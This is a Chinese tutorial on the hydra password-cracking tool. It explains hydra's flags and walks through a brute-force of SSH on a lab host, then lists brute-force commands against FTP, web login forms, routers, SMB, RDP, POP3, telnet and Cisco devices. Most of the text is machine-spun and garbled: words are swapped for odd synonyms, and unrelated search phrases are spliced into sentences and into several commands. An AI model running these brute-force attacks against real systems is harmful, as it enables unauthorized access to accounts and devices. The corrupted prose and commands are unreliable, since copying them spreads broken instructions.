【渗透测试】密码爆破工具——九头蛇(hydra)使用详解及实战

九头蛇hydra

记得美国队长中的大反派hydra(九头蛇)安排吗?

今日介绍的这款浸透检验东西,也叫这个名字。

hydra是闻名安排thc的一款开源的暴力破解暗码东西,功用非常健壮

kali下是默许设备的,几乎支撑全部协议的在线破解。

【浸透检验】暗码爆炸东西——九头蛇(hydra)运用详解及实战

暗码能否破解,在于字典是否健壮以及电脑的功用。

我们就介绍下,这个配备怎样用

【浸透检验】暗码爆炸东西——九头蛇(hydra)运用详解及实战

运用线程池创立的四种办法

语法:Hydra 参数 IP开源节流什么意思 服务

参数:
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定暗码破解,很少运用,一般采用暗开源众包码字典。
-P file 大写,用于指定暗码字典。
-e ns 额外的选项,n:空暗码探问,s:运用指定账户和暗码探问
-M file 指定方针ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或许暗码的时分连续破解。
-t tasks 一起工作的线程数,默许是16
-w time 设线程安全置最大超时时间,单位
-v / -V电脑开不了机怎样办 显现具体进程
-R 康复爆炸(假定破解开源软件中断了,下次履行 hydra -R /path/to/hydra.restore 就能够持续使命。)
-x 自定义暗码。

service:指定服务名,支撑的服务跟协议有:telnet,ftp,pop3等等。
留心点:1.自己创立字典,然后放在其时的目录下或许指定目录。
2.参数能够电脑开不了机怎样办共同放在最终,格式比如hydra ip 服务 参数。
3.假定能承认用户名一项时分,比如web登录破解,直接用 -l就能够,然后剩余时间破解暗码。
4.缺陷,假定方针网站登录时分需求验证码电脑怎样康复出厂设置就无法破解。
5.man hydra最万能。
6.或许hydra -U http-form等检查具体帮助。

案例剖析

暴破ssh登录暗码

环境介绍

攻击机:kali
装有hydra东西
靶机:192.168.154.131
设备ssh服务,正常https和http的差异工作

为了检验便当,我们创立两个简略的字典文件,如下:

【浸透检验】暗码爆炸东西——九头蛇(hydra)运用详解及实战

开始爆炸

依据指令参数,安排参数HTTPS格式如下:

root@kali:/mnt# hydra -L user.t线程撕裂者xt -P password.txt -t 2 -vV -e电脑键盘功用基础知识 ns 192.168.154.131 ssh

破解成功

因为字典https协议数量比较少,我们能够简单的破解成功,可是实践情况下,咱线程的几种状况们或许需求良久。

HTTP验登录

运用得到的用户名/暗码登录服务器,登录成功

【浸透检验】暗码爆炸东西——九头蛇(hydra)运用详解及实战

各种协议破解汇总

FTP协议破解

破解ftp:
hydra -L 用户名字典 -P 暗码字典 -t 6 -e ns IP地址 -v

http协议破解

get办法开源节流提交,破解web登录:
hydra -L 用户名字典 -P 暗码字https域名典 -t 线程 -v -e ns IP地址 http-get /admin/
hydra -L 用户名字典 -P 暗码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php
post办法提交,破解web登录:
hydra -f -l 用户名 -P 暗码字典 -V -s 9900 IP地址 htt电脑怎样衔接wifip-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"
#/index.php …这个是登录的 url
#后门是POST的数据 其间的用户名暗码运用 USER PASS 来线程撕裂者替代
#然后是假定登录犯错 会呈现的字符 。。HTTPS。然后开始破解

https协议破解

破解h开源代码网站githubttps
hydra -电脑怎样康复出厂设置m /index.php -l 用户名 -P 暗码字典.txt Ihttp 302P地址 https

路由器破解

hydra -l admin -x 6:10:1a.~!@#线程和进程的差异是什么$%^&()-= -t 8 192.168.1.1 http-get /
-l admin 为检验破解的用户名。
# -x 6:10:1a. 表明枚举的暗码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。-t 8 表明分 8 个并行使命进行爆炸检验。192.168.1.1 为 Router 地址。http-ge开源阅览t 为破解办法(协议)

http-proxy协议破解

破解http-proxy:
hydra -l admin -P 字典.txt http-pr电脑蓝屏了怎样办修复oxy://IP地址

smb破解

破解smb:
hydra -l 用户名字典 -P 暗码字典 IP地址 smb

Windows长途桌面

破解rdp(windows长途登录):
hydra ip地址 rdp -l administrator -P 暗码字典.txt -V

邮箱pop3

破解邮箱pop3:
hydra -l 用户名 -P 暗码字典.txt my.pophttpwatch3.mail pop3

telnet破解https和http的差异

hydra ip地址 telnet -l 用户字典.txt -P 暗码字典.tx电脑t -t 3线程池2 -s 23 -e ns -f -V

语音通讯东西te电脑怎样衔接wifiamspeak

hydra -l 用户名字开源阅览典 -P 暗码字典http://www.baidu.com.txt -s 端口号 -vV ip teamspeak

cisco

hydrahttp://www.baidu.com -P 暗码字典 IP地址 c电脑截图快捷键isco
hydra -m cloud -P 暗码字典 IP地址 cisco-enable

发表评论

提供最优质的资源集合

立即查看 了解详情